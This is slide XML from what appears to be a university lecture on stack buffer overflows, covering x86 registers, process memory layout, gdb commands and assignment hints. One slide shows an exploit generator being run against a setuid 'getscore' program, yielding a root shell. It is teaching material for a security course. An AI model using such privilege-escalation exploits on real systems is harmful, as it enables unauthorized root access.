              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>                   3. What value of EIP should be put in?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67594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4583875-7B9C-2D40-8249-00FEF912711E}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld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nimBg="1"/>
      <p:bldP spid="36872" grpId="0" animBg="1"/>
      <p:bldP spid="29709" grpId="0" animBg="1"/>
      <p:bldP spid="29710" grpId="0" animBg="1"/>
      <p:bldP spid="29711" grpId="0" animBg="1"/>
      <p:bldP spid="297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Some useful gdb commands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Load a core file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone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             target core core_filename</a:t>
            </a:r>
          </a:p>
          <a:p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Examine registers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         </a:t>
            </a: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info registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="280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Examine memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone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           </a:t>
            </a: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x/#of words to display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Help</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone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           </a:t>
            </a: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help [command]</a:t>
            </a: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20FEC6A-9D76-E84C-8613-AC206B06FC2B}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld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Buffer overflow vulnerability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Program fails to ensure that a write to a buffer is always within its bound.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="280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When buffer overflow happens, data structures in memory will be corrupted, potentially changing the program’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>In many cases it can lead to the execution of arbitrary code by attackers</a:t>
            </a:r>
          </a:p>
          <a:p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A common problem for unsafe programming languages such as C and C++.</a:t>
            </a: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B63E8A9-5A1A-0D47-BA83-00C880AFF5DC}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>2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3107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Hints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9530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Size of the buffer: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Must be long enough to contain the shellcode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Must be long enough to override saved EIP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 order of bytes in memory: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x/86 is a little-endian architecture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What if the distance is not a multiple of four?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Value of EIP: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Impacted by the value of ESP</a:t>
            </a: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5C6606B-B1FD-D245-ABEE-7A5C372DFAF5}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld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Getting a root shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72706" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="81534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/>
              <a:t>[xou@localhost simon]$ ./exploit_gen_with_esp 0xbffff830 160 120</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Length of shell code: 45</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Using sp: 0xbffff830</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Using address: 0xbffff7b8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>NOP sled: 103 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>[xou@localhost simon]$ cd /root/course_scores/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>[xou@localhost course_scores]$ ./getscore aaa $EGG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>sh-2.05b#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>sh-2.05b# </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/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58ADD48-5FA9-0C49-B050-3C2F43B69FF5}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld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32-bit x86 CPU registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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1600200" y="1752600"/>
            <a:ext cx="2362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EAX</a:t>
            </a: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1676400" y="21336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/>
              <a:t>accumulator</a:t>
            </a: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4495800" y="1752600"/>
            <a:ext cx="2362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ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31749" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="21336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/>
              <a:t>stack pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31750" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="2590800"/>
            <a:ext cx="2362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EBX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31751" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="29718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/>
              <a:t>base</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31752" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="3429000"/>
            <a:ext cx="2362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ECX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31753" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="38100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/>
              <a:t>counter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31754" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="4267200"/>
            <a:ext cx="2362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EDX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31755" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="46482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/>
              <a:t>data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31756" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2590800"/>
            <a:ext cx="2362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EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31757" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="29718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/>
              <a:t>base pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31758" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3429000"/>
            <a:ext cx="2362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ESI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31759" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="38100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/>
              <a:t>source index</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31760" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="4267200"/>
            <a:ext cx="2362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EDI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31761" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="46482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/>
              <a:t>destination index</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31762" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="5105400"/>
            <a:ext cx="2362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EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31763" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="5486400"/>
            <a:ext cx="1981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/>
              <a:t>instruction pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31764" name="Slide Number Placeholder 2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7369960-356C-A14B-B1B1-FF2647C8903D}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld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2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="1752600"/>
            <a:ext cx="29718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4" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="609600"/>
            <a:ext cx="2971800" cy="406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/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="990600"/>
            <a:ext cx="2971800" cy="406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/>
              <a:t>.data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33796" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="1371600"/>
            <a:ext cx="2971800" cy="4064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/>
              <a:t>heap allocated data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33797" name="Text Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3232150" y="1952625"/>
            <a:ext cx="297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/>
              <a:t>heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33798" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="2590800"/>
            <a:ext cx="297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/>
              <a:t>stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33799" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4540250" y="2362200"/>
            <a:ext cx="4889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&lt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33800" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4540250" y="1828800"/>
            <a:ext cx="4889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&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33801" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="3048000"/>
            <a:ext cx="2971800" cy="7620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local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33802" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="4540250"/>
            <a:ext cx="2971800" cy="3762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function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
              <a:t>s arguments</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33803" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3260725" y="3810000"/>
            <a:ext cx="2971800" cy="3762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saved EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33804" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3263900" y="4175125"/>
            <a:ext cx="2971800" cy="3762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saved EIP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33805" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3263900" y="4916488"/>
            <a:ext cx="2971800" cy="64611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main() local variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33806" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="6338888"/>
            <a:ext cx="1981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bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33807" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2819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ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33808" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="35814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EBP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33809" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3048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Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3810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1" name="AutoShape 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="746125" y="1295400"/>
            <a:ext cx="533400" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 20714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Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1203325" y="1447800"/>
            <a:ext cx="5492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address growth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33813" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="3962400"/>
            <a:ext cx="2209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function’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s return address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3814" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="5410200" y="4343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5" name="Rectangle 48"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="0"/>
            <a:ext cx="2971800" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Linux process memory map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6" name="Text Box 49"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265488" y="5562600"/>
            <a:ext cx="2971800" cy="3810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argc, **argv, **envp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33817" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265488" y="5943600"/>
            <a:ext cx="2971800" cy="3810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environment var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800"/>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Line Callout 2 34"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="2351088"/>
            <a:ext cx="1143000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solidFill>
            <a:srgbClr val="FF6600">
              <a:alpha val="50195"/>
            </a:srgbClr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a stack frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rounded Rectangle 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2994025"/>
            <a:ext cx="3429000" cy="88106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0" name="Slide Number Placeholder 3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425CB42-9127-074B-905B-77E8F7C3459A}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld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Calling a function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1827213"/>
            <a:ext cx="1447800" cy="282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main(){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function(s)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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843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8580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46BB17A-790E-E043-B774-FB9447A8B082}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35844" name="Group 35"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="1524000"/>
            <a:ext cx="3341688" cy="4800600"/>
            <a:chOff x="5017197" y="609600"/>
            <a:chExt cx="4355403" cy="5715000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35846" name="Rectangle 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="1752600"/>
              <a:ext cx="2971800" cy="321128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7" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="609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.text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35848" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="990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.data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35849" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396037" y="1371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heap</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35850" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6396036" y="4433490"/>
              <a:ext cx="29718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top of stack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35851" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562799" y="4204890"/>
              <a:ext cx="60171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&lt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35852" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7562800" y="1828800"/>
              <a:ext cx="60171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&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35853" name="Text Box 22"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6399212" y="4916488"/>
